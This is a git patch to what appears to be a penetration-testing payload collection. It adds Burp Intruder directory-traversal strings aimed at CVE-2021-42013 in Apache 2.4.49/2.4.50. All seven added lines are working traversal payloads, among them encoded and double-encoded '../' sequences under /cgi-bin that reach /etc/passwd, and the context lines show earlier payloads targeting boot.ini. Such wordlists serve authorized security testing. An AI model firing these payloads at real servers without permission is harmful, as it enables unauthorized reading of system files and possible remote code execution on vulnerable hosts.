From 7e737baa238edc43c13cad6e3220fe7dd4d7d151 Mon Sep 17 00:00:00 2001
From: Markus <mail@markusschader.de>
Date: Mon, 11 Oct 2021 10:11:10 +0200
Subject: [PATCH] Update directory traversal wordlist

Update the intruder wordlist to include CVE-2021-42013 (Traversal/RCE into Apache 2.4.49/2.4.50).
Also add some depth to the current fuzzing payloads to not miss /cgi-bin directories which are located deeper than 4 subdirectories.
---
 Directory Traversal/Intruder/directory_traversal.txt | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/Directory Traversal/Intruder/directory_traversal.txt b/Directory Traversal/Intruder/directory_traversal.txt
index aac01f1..a8bece0 100644
--- a/Directory Traversal/Intruder/directory_traversal.txt	
+++ b/Directory Traversal/Intruder/directory_traversal.txt	
@@ -131,3 +131,10 @@ C:\boot.ini
 ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
 /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd